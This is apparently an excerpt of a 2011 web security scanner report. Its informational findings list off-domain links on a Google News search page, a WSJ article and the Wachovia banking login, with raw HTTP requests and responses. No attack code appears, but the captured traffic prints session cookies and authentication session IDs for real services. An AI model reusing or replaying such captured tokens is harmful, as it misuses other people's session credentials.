<p class="title"><a target="_blank" class="usg-AFQjCNEmSPrNzZMoYIxJzX1eDxoebopO9g " href="http://search.japantimes.co.jp/cgi-bin/fl20110109x2.html" id=""><span class="titletext">
...[SNIP]...
<a onclick="return false;" href="javascript:void(0);"><img class="icon home-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">
Make Google News my homepage</a>
...[SNIP]...
<a href="http://news.google.com/news?pz=1&amp;cf=i&amp;ned=us&amp;hl=en&amp;q=bluefin+tuna&amp;output=rss"><img class="icon feed-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">RSS</a>
...[SNIP]...
</a>&nbsp;- <a href="http://googlenewsblog.blogspot.com/">Blog</a>
...[SNIP]...

16.35. http://news.google.com/news/section  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.google.com
Path:   /news/section

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /news/section?pz=1&ned=us&hl=en&q=bluefin+tuna&hdlOnly=1 HTTP/1.1
Host: news.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 03 Feb 2011 01:03:21 GMT
Expires: Thu, 03 Feb 2011 01:03:21 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta http-equiv="X-UA-Compatible" content="IE=8">
<meta http-equiv="Content-Type" content="text/h
...[SNIP]...
</title>
<link href="http://www.gstatic.com/news/img/favicon.ico" rel="icon" type="image/x-icon">
<link rel="alternate" type="application/rss+xml" href="http://news.google.com/news?pz=1&amp;hdlOnly=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;q=bluefin+tuna&amp;output=rss">
...[SNIP]...
</div><a href="http://www.youtube.com/?q=bluefin+tuna&hl=en&ned=us&tab=n1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<a href="/news?pz=1&amp;hdlOnly=1&amp;ned=us"><img src="http://www.gstatic.com/news/img/logo/en_us/news.gif" width="171" height="40" alt="Google News"></a>
...[SNIP]...
<a href="/news?pz=1&amp;hdlOnly=1&amp;cf=all&amp;ned=us&amp;ict=ln" class="persistentblue"><img class="chip nav-0" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;hdlOnly=1&amp;cf=all&amp;ned=us&amp;topic=ss&amp;ict=ln" class="persistentblue"><img class="chip nav-ss" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>Starred<img class="icon star-icon star-nav starred" alt="" src="http://www.gstatic.com/news/img/cleardot.gif"></span>
...[SNIP]...
<a href="/news/section?pz=1&amp;hdlOnly=1&amp;cf=all&amp;ned=us&amp;topic=w&amp;ict=ln" class="persistentblue"><img class="chip nav-w" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;hdlOnly=1&amp;cf=all&amp;ned=us&amp;geo=detect_metro_area&amp;ict=ln" class="persistentblue"><img class="chip nav-1" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;hdlOnly=1&amp;cf=all&amp;ned=us&amp;topic=n&amp;ict=ln" class="persistentblue"><img class="chip nav-n" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;hdlOnly=1&amp;cf=all&amp;ned=us&amp;topic=b&amp;ict=ln" class="persistentblue"><img class="chip nav-b" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;hdlOnly=1&amp;cf=all&amp;ned=us&amp;topic=t&amp;ict=ln" class="persistentblue"><img class="chip nav-t" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;hdlOnly=1&amp;cf=all&amp;ned=us&amp;topic=e&amp;ict=ln" class="persistentblue"><img class="chip nav-e" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;hdlOnly=1&amp;cf=all&amp;ned=us&amp;topic=s&amp;ict=ln" class="persistentblue"><img class="chip nav-s" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;hdlOnly=1&amp;cf=all&amp;ned=us&amp;topic=m&amp;ict=ln" class="persistentblue"><img class="chip nav-m" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<a href="/news/section?pz=1&amp;hdlOnly=1&amp;cf=all&amp;ned=us&amp;topic=ir&amp;ict=ln" class="persistentblue"><img class="chip nav-ir" src="http://www.gstatic.com/news/img/cleardot.gif" width="6" height="13" alt=""><span>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHZnYlp_nKuoVGKfnrmD1r9tnLW_A " href="http://search.japantimes.co.jp/cgi-bin/nn20110203f3.html" id="MAA4AEgAUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGpfdfO-WIJKvdFhiarue3EiinlOw " href="http://news.change.org/stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi" id="MAA4AEgBUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHcMze2ae6ebOI2C3PaK6ur06hVxA " href="http://www.abc.net.au/rural/news/content/201102/s3126694.htm" id="MAA4AEgCUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGPUf4wF77288my2Oclv1m5RQxCug " href="http://www.journalpioneer.com/News/Local/2011-02-01/article-2189851/Premiers-Cup-goes-to-Northport-fisher/1" id="MAA4AEgDUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGsIpimsSlc6862oQxES7yIG08YKw " href="http://online.wsj.com/article/SB10001424052748703779704576073610615364334.html" id="MAA4AEgEUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHlrZSVNM6Zz6hhcU2h9fR5HO18TQ " href="http://www.kansascity.com/2011/01/10/2573323/earthtalk-are-atlantic-bluefin.html" id="MAA4AEgFUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.mpbn.net/News/MaineHeadlineNews/tabid/968/ctl/ViewItem/mid/3479/ItemId/14769/Default.aspx" target="_blank" class="usg-AFQjCNGo-CB9ZWSi7CQDkz5h4dPyoFpbkA " id="MAA4AEgFUAFgAmoCdXN6AA">Feds Hear Maine Fishermen&#39;s Concerns About <b>
...[SNIP]...
<div class="aa-inner"><a href="http://search.japantimes.co.jp/cgi-bin/fl20110109x1.html" target="_blank" class="usg-AFQjCNHJgKrjx821lalk2U6xhw6rFd8OBw " id="MAA4AEgFUAJgAmoCdXN6AA">Are Japan&#39;s fish lovers eating <b>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEAs5yHkoxf5PLIbduZdvDTPNANTw " href="http://www.smh.com.au/environment/whale-watch/bps-plan-could-impact-on-whales-groups-20110118-19v04.html" id="MAA4AEgGUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGjeMWFHNSlwu8XejXELihMYQVcvA " href="http://www.boston.com/yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html" id="MAA4AEgHUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html" target="_blank" class="usg-AFQjCNH52BLsY2WurPkWqJhq7w-hVZkTwg " id="MAA4AEgHUAFgAmoCdXN6AA"><b>
...[SNIP]...
<div class="aa-inner"><a href="http://www.perishablenews.com/index.php?article=0012418" target="_blank" class="usg-AFQjCNEb2onXiwetCVbrzfC8pLeqUq_iLw " id="MAA4AEgHUAJgAmoCdXN6AA"><b>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGU4Dw__ikAvrPZ4CXmdyvVoq1ekQ " href="http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html" id="MAA4AEgHUANgCGoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGEvz8wD5KFUBDRm8fyTutGxh15BA " href="http://www.heraldsun.com.au/ipad/blue-sky-thinking-at-farm/story-fn6bn4mv-1225993868919" id="MAA4AEgIUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.theaustralian.com.au/business/clean-seas-tuna-scales-back-its-losses/story-e6frg8zx-1225993875502" target="_blank" class="usg-AFQjCNHSGv6ptSe6ATRL04XhL1LAb8DP9g " id="MAA4AEgIUAFgAmoCdXN6AA">Clean Seas <b>
...[SNIP]...
<div class="aa-inner"><a href="http://www.fis.com/fis/worldnews/worldnews.asp?monthyear=&amp;day=25&amp;id=40221&amp;l=e&amp;special=&amp;ndb=1%20target=" target="_blank" class="usg-AFQjCNFrD2qfITwsI5Hls4kuQEAJuC4YOg " id="MAA4AEgIUAJgAmoCdXN6AA">Clean Seas cuts its financial losses</a>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNG8ugL9cP4_P_deE4rc6bJsN-B8Cg " href="http://www.portlincolntimes.com.au/news/local/news/general/captive-tuna-spawn-again/2056995.aspx" id="MAA4AEgIUANgCGoCdXN6AA"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGDU8BhJeFC8fWZCb6uhT-qKM1UPQ " href="http://www.news.com.au/business/breaking-news/clean-seas-tuna-ltd-says-it-expects-to-post-a-net-loss/story-e6frfkur-1225993482916" id="MAA4AEgIUARgCGoCdXN6AA"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNFvJ5WUoobkuCPj9ljljw0mWx5tJg " href="http://sj.farmonline.com.au/news/state/viticulture/general/clean-seas-flags-smoother-sailing-ahead/2056939.aspx" id="MAA4AEgIUAVgCGoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHu1z-4ORhHR4_rVodkSQbI-MiUbQ " href="http://www.opposingviews.com/i/bluefin-tuna-sells-for-400-000-in-tokyo-market" id="MAA4AEgJUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.emagazine.com/view/?5489" target="_blank" class="usg-AFQjCNHLfbvmdTXC_JFpoj9By0s9_ZrFJg " id="MAA4AEgJUAFgAmoCdXN6AA">More Sustainable Sushi</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.projo.com/opinion/contributors/content/CT_nefish_01-11-11_ORLPT84_v8.4117508.html" target="_blank" class="usg-AFQjCNFSHqxzZNorv-GD6GRevN8tf1VjUw " id="MAA4AEgJUAJgAmoCdXN6AA">David E. Preble: Parisian <b>
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNHUzQytF4YUm3hkyaxnBn6FMo51QQ " href="http://www.grist.org/article/food-2011-01-11-boycotting-bluefin-isnt-enough-time-to-turn-on-the-siren" id="MAA4AEgJUANgCGoCdXN6AA"><span class="titletext">
...[SNIP]...
<span><a target="_blank" class="usg-AFQjCNGbM6wrHBqq9Iz3qod7D0OxahPBPQ " href="http://food.change.org/blog/view/bluefin_brigade_to_the_rescue" id="MAA4AEgJUARgCGoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFgg6TzF0vDdzqoj-Hg6p_dX--3jg " href="http://cnews.canoe.ca/CNEWS/Environment/Suzuki/2011/01/18/16940341.html" id="MAA4AEgKUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.jpost.com/ArtsAndCulture/FoodAndWine/Article.aspx?id=203979" target="_blank" class="usg-AFQjCNHX59xpWXbvg3fyXLkYwUCR1S5vuw " id="MAA4AEgKUAFgAmoCdXN6AA">World of Mouth: Tunarama!</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.enewspf.com/latest-news/science-a-environmental/21129-world-renowned-chefs-join-call-to-boycott-bluefin-.html" target="_blank" class="usg-AFQjCNGSOsUWp9b0dGDt-SyTBDvQXCneOA " id="MAA4AEgKUAJgAmoCdXN6AA">World-renowned Chefs Join Call to Boycott <b>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNG2-iG7R684r1nozJ4ewcSV6P-fqw " href="http://www.upi.com/Science_News/2011/01/07/Blue-fin-tuna-sells-for-400000-in-Tokyo/UPI-23331294451264/" id="MAA4AEgLUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japan/" target="_blank" class="usg-AFQjCNHorcaXaj6CgrvEd-2rU2qMSnAnBA " id="MAA4AEgLUAFgAmoCdXN6AA"><b>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFQ2uEA-uR_tqNgFltc180eKhocqQ " href="http://www.globalpost.com/dispatch/asia/110120/tunarama-festival-australia" id="MAA4AEgMUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNGiQqeydXCx7U-Zo5WcdMqY9g8UuA " href="http://www.abc.net.au/news/stories/2011/02/03/3128653.htm?section=justin" id="MAA4AEgNUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNEbnuNQI9Gw-zL-cLl7x8zaWq2NGQ " href="http://www.abc.net.au/news/stories/2011/01/20/3117032.htm?section=justin" id="MAA4AEgOUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFBEnOy9qhF4lsn7KivtVh9OzQpGw " href="http://www.courthousenews.com/2011/01/14/33343.htm" id="MAA4AEgPUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFoTeIB3bwW24C1V3LJvwkhiJzU4Q " href="http://www.fis.com/fis/worldnews/worldnews.asp?l=e&amp;country=0&amp;special=&amp;monthyear=&amp;day=&amp;id=40138&amp;ndb=1&amp;df=0" id="MAA4AEgQUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFHut3J84rCrCqV1Aeih20Np3Jb2A " href="http://feeds.nytimes.com/click.phdo?i=af650d703efc23e899208543684d8cbe" id="MAA4AEgRUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNFOHeTN6xxu80u2Fggr0eJMZq5-1g " href="http://www.thestandard.com.hk/news_detail.asp?we_cat=4&amp;art_id=107529&amp;sid=31063765&amp;con_type=1&amp;d_str=20110127&amp;fc=4" id="MAA4AEgSUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://www.rthk.org.hk/rthk/news/englishnews/20110126/news_20110126_56_729958.htm" target="_blank" class="usg-AFQjCNHLtx-zlG_bsYbqz7VY3aNvcI2WkQ " id="MAA4AEgSUAFgAmoCdXN6AA">Ocean Park &#39;putting species at risk&#39;</a>
...[SNIP]...
<div class="aa-inner"><a href="http://www.monstersandcritics.com/news/asiapacific/news/article_1614700.php/Greens-slam-Hong-Kong-theme-park-for-importing-endangered-species" target="_blank" class="usg-AFQjCNFPnm0dnzgpsDQlDK1hA1hHLmgxJw " id="MAA4AEgSUAJgAmoCdXN6AA">Greens slam Hong Kong theme park for importing endangered species</a>
...[SNIP]...
<h2 class="title"> <a target="_blank" class="usg-AFQjCNHMv3K4gAqJ5CkhAEDN_ZJQ5lnMHw " href="http://thehill.com/blogs/e2-wire/677-e2-wire/137679-news-bites-dispute-over-tuna-spotlights-oil-spills-effects-drilling-court-case-moves-ahead-and-more" id="MAA4AEgTUABgAWoCdXN6AA"><span class="titletext">
...[SNIP]...
<div class="aa-inner"><a href="http://switchboard.nrdc.org/blogs/lsuatoni/the_evaluation_of_deepwater_ho.html" target="_blank" class="usg-AFQjCNFziuziyKtuPUEMEPJVJt8a8dHlQA " id="MAA4AEgTUAFgAmoCdXN6AA">The Evaluation of Deepwater Horizon&#39;s Environmental Toll (Challenges of a <b>
...[SNIP]...
<a onclick="return false;" href="javascript:void(0);"><img class="icon home-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">
Make Google News my homepage</a>
...[SNIP]...
<a href="http://news.google.com/news?pz=1&amp;hdlOnly=1&amp;cf=all&amp;ned=us&amp;hl=en&amp;q=bluefin+tuna&amp;output=rss"><img class="icon feed-icon" width="15" height="15" alt="" src="http://www.gstatic.com/news/img/cleardot.gif">RSS</a>
...[SNIP]...
</a>&nbsp;- <a href="http://googlenewsblog.blogspot.com/">Blog</a>
...[SNIP]...

16.36. http://online.wsj.com/article/SB10001424052748703956604576110453371369740.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424052748703956604576110453371369740.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /article/SB10001424052748703956604576110453371369740.html?KEYWORDS=arbor+networks HTTP/1.1
Host: online.wsj.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:04:26 GMT
Server: Apache/2.0.58 (Unix)
Set-Cookie: djcs_route=7a2f1eb2-978f-44b2-9bd7-93572f6b1271; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:26 2021; max-age=315360000
Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:26 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep04 - Wed 02/02/11 - 15:23:45 EST
Cache-Control: max-age=15
Expires: Thu, 03 Feb 2011 01:04:41 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=31
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 199594

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2486"></script>
...[SNIP]...
<li class="hat_tab" id="hat_tab2">
<a onclick="hat.track('MW')" href="http://www.marketwatch.com" id="hat_link2"></a>
</li>
<li class="hat_tab" id="hat_tab3">
<a onclick="hat.track('BOL')" href="http://online.barrons.com/home" id="hat_link3"></a>
</li>
<li class="hat_tab" id="hat_tab4">
<a onclick="hat.track('ATD')" href="http://allthingsd.com" id="hat_link4"></a>
</li>
<li class="hat_tab" id="hat_tab6">
<a onclick="hat.track('FINS')" href="http://www.fins.com" id="hat_link6"></a>
</li>
<li class="hat_tab" id="hat_tab7">
<a onclick="hat.track('SM')" href="http://www.smartmoney.com" id="hat_link7"></a>
...[SNIP]...
<li class="hat_drop_item" id="hat_more1">
<a onclick="hat.track('BC')" href="http://bigcharts.marketwatch.com/">BigCharts</a>
...[SNIP]...
<li class="hat_drop_item" id="hat_more2">
<a onclick="hat.track('VSE')" href="http://vse.marketwatch.com/Game/Homepage.aspx">Virtual Stock Exchange</a>
...[SNIP]...
<li class="hat_drop_item" id="hat_more9">
<a href="http://www.wsjradio.com">WSJ Radio</a>
...[SNIP]...
<li class="hat_drop_item" id="hat_more10">
<a onclick="hat.track('FNO')" href="http://www.efinancialnews.com/">Financial News</a>
...[SNIP]...
<li class="hat_drop_item lifestyleItem" id="hat_more13">
<a href="http://www.wsjwine.com/">WSJ<span>
...[SNIP]...
<li class=" ">
<a href="http://allthingsd.com/" class="linklist_link">All Things Digital</a>
...[SNIP]...
your personal, non-commercial use only. To order presentation-ready copies for distribution to your colleagues, clients or customers, use the Order Reprints tool at the bottom of any article or visit
<a class="firstLink" href="http://www.djreprints.com" target="_blank">www.djreprints.com</a>
...[SNIP]...
<li><a rel="nofollow" class="share_icn share_yahoo" href="http://buzz.yahoo.com/buzz?publisherurn=wsj&amp;targetUrl=" id="afbtt.share.ybuzz" target="_blank">Yahoo! Buzz</a>
...[SNIP]...
<p><a href="http://www.djreprints.com">www.djreprints.com</a>
...[SNIP]...
</div><a href="http://buzz.yahoo.com/buzz?publisherurn=wsj&amp;targetUrl=" class="tipTarget" id="afbbt.share.ybuzz" target="_blank"><img src="http://s.wsj.net/img/icon_buzz.gif" alt="Yahoo Buzz" />
...[SNIP]...
</script>
<script type="text/javascript" src="http://adsyndication.msn.com/delivery/getads.js">
</script>
...[SNIP]...
<h2><a rel="nofollow" class="yahoo" target="_blank" href="http://finance.yahoo.com" title="[Back to Yahoo! Finance]">Back To </a>
...[SNIP]...
<li><a rel="nofollow" class="msn" target="_blank" href="http://moneycentral.msn.com/" title="[Back to MSN Money]"></a></li>
   <li><h2><a rel="nofollow" target="_blank" href="http://moneycentral.msn.com/">MSN Money Homepage</a>
...[SNIP]...
<h2><a rel="nofollow" target="_blank" href="http://moneycentral.msn.com/investor/home.asp">MSN Money Investing</a>
...[SNIP]...
</h3>
<iframe scrolling="no" frameborder="0" src="http://www.facebook.com/widgets/recommendations.php?header=false&height=300&width=377&site=online.wsj.com&border_color=white" style="border: medium none; overflow: hidden; height: 300px; width: 377px;"></iframe>
...[SNIP]...
<li>
               
               
                    <a href="http://twitter.com/RogerWCheng"> <img src="http://a1.twimg.com/profile_images/1180445593/Julia_s_Wedding_Rehearsal_Dinner_normal.jpg" alt="http://twitter.com/RogerWCheng" /></a>
        <p><a href="http://twitter.com/RogerWCheng"><b>
...[SNIP]...
<span class="sourceLink"><a href="http://twitter.com/RogerWCheng/statuses/32890303060910081">Moments ago</a>
...[SNIP]...
<li>
               
               
                    <a href="http://twitter.com/WSJdigits"> <img src="http://a2.twimg.com/profile_images/78075565/digits_blog_normal.JPG" alt="http://twitter.com/WSJdigits" /></a>
        <p><a href="http://twitter.com/WSJdigits"><b>
...[SNIP]...
<span class="sourceLink"><a href="http://twitter.com/WSJdigits/statuses/32885972572045312">Moments ago</a>
...[SNIP]...
<li>
               
               
                    <a href="http://twitter.com/WSJdigits"> <img src="http://a2.twimg.com/profile_images/78075565/digits_blog_normal.JPG" alt="http://twitter.com/WSJdigits" /></a>
        <p><a href="http://twitter.com/WSJdigits"><b>
...[SNIP]...
<span class="sourceLink"><a href="http://twitter.com/WSJdigits/statuses/32878218813902848">7 min ago</a>
...[SNIP]...
<li>
               
               
                    <a href="http://twitter.com/LaurenGoode"> <img src="http://a1.twimg.com/profile_images/978259298/goodewebtwit_normal.jpg" alt="http://twitter.com/LaurenGoode" /></a>
        <p><a href="http://twitter.com/LaurenGoode"><b>
...[SNIP]...
<span class="sourceLink"><a href="http://twitter.com/LaurenGoode/statuses/32877536090263553">9 min ago</a>
...[SNIP]...
<li>
               
               
                    <a href="http://twitter.com/LaurenGoode"> <img src="http://a1.twimg.com/profile_images/978259298/goodewebtwit_normal.jpg" alt="http://twitter.com/LaurenGoode" /></a>
        <p><a href="http://twitter.com/LaurenGoode"><b>
...[SNIP]...
<span class="sourceLink"><a href="http://twitter.com/LaurenGoode/statuses/32874692503142400">21 min ago</a>
...[SNIP]...
</div><a href="http://buzz.yahoo.com/buzz?publisherurn=wsj&amp;targetUrl=" class="tipTarget" id="aibt.share.ybuzz" target="_blank"><img src="http://s.wsj.net/img/icon_buzz.gif" alt="Yahoo Buzz" />
...[SNIP]...
</div>
<a rel="entry-content" href="http://ie8.smoothfusion.com/WallStreetJournal/view.aspx">LINKS TO ACTUAL PAGE CONTAINING WEB SLICE FUNCTIONALITY.</a>
<a rel="bookmark" target="_blank" href="http://www.wallstreetjournal.com" ></a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.wsjdigital.com/?mod=WSJ_footer">Advertising</a>
...[SNIP]...
<li><a href="http://www.wsjlocal.com/?mod=WSJ_footer" rel="nofollow">Advertise Locally</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.dj.com/?mod=WSJ_footer">About Dow Jones</a>
...[SNIP]...
<li><a href="http://www.dowjones.com/Careers/Careers.htm?mod=WSJ_footer" rel="nofollow">Jobs at WSJ.com</a>
...[SNIP]...
<li id="futureLeadProgLink" style="display:none;"><a href="http://www.wsj-asia.com/flp/about.html?mod=WSJ_footer" rel="nofollow">Future Leadership Program</a>
...[SNIP]...
<li><a class="icon_facebook" href="http://www.facebook.com/wsjonline?mod=WSJ_footer" target="_blank">WSJ on Facebook</a>
...[SNIP]...
<li><a href="http://www.marketwatch.com/?siteid=wsj&dist=freedjsiteslink&mod=WSJ_footer">Marketwatch.com</a>
...[SNIP]...
<li><a href="http://online.barrons.com/public/main?mod=WSJ_footer">Barrons.com</a>
...[SNIP]...
<li><a href="http://www.smartmoney.com/?mod=WSJ_footer">SmartMoney.com</a>
...[SNIP]...
<li><a href="http://allthingsd.com/?reflink=DNH_EUR&mod=WSJ_footer">AllThingsD.com</a>
...[SNIP]...
<li class="fins"><a href="http://www.fins.com/?mod=WSJ_footer">FINS:</a> <a href="http://www.fins.com/finance/?mod=WSJ_footer">Finance,</a> <a href="http://it-jobs.fins.com/?mod=WSJ_footer">IT jobs,</a> <a href="http://sales-jobs.fins.com/?mod=WSJ_footer">Sales jobs</a>
...[SNIP]...
<li><a href="http://bigcharts.marketwatch.com/?mod=WSJ_footer">BigCharts.com</a>
...[SNIP]...
<li><a href="http://vse.marketwatch.com/Game/Homepage.aspx?mod=WSJ_footer">Virtual Stock Exchange</a>
...[SNIP]...
<li><a rel="nofollow" href="http://wsjradio.com?mod=WSJ_footer">WSJ Radio</a>
...[SNIP]...
<small class="acapLogo"><a href="http://the-acap.org/acap-enabled.php?mod=WSJ_footer" target="_blank"><span>
...[SNIP]...
</script>
<script type="text/javascript" src="http://stags.peer39.net/712/trg_712.js"></script>
...[SNIP]...

16.37. https://onlineservices.wachovia.com/auth/AuthService  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlineservices.wachovia.com
Path:   /auth/AuthService

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /auth/AuthService?action=presentLogin&url=https%3a//onlineservices.wachovia.com/NASApp/NavApp/Titanium%3faction%3dreturnHome HTTP/1.1
Host: onlineservices.wachovia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:02:15 GMT
Server: IBM_HTTP_Server
Set-Cookie: TLTSID=180A7ADA2F18102F627BF4BD25DC1122; Path=/; Domain=.wachovia.com
Cache-Control: no-store
Pragma: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: AuthSvsSessionID=fhRKb9n005b+mJuAP/1cdcL3/mI=55 4N.d5m2E9FOaI1Z8q7rXu6BoQrr.3493490; HttpOnly; Path=/; Domain=.wachovia.com; Secure
x-frames-option: deny
Connection: close
Content-Type: text/html
Content-Language: en
Content-Length: 13099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--


-->
<html xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
</title>


   <link href="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/css/index.css" rel="stylesheet" type="text/css" media="screen" />
       

   <link href="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/css/index-p.css" rel="stylesheet" type="text/css" media="print" />
   <style type="text/css">
...[SNIP]...
</style>
   <link href="https://a248.e.akamai.net/f/248/34582/7d/onlineservices.wachovia.com/ols/css/handheld.css" rel="stylesheet" type="text/css" media="handheld" />

   <script type="text/javascript" language="JavaScript1.2" src="https://a248.e.akamai.net/f/248/34586/7d/www.wachovia.com/onlineservices/help/js/RoboHelp_CSH.js"></script>
...[SNIP]...
</script>
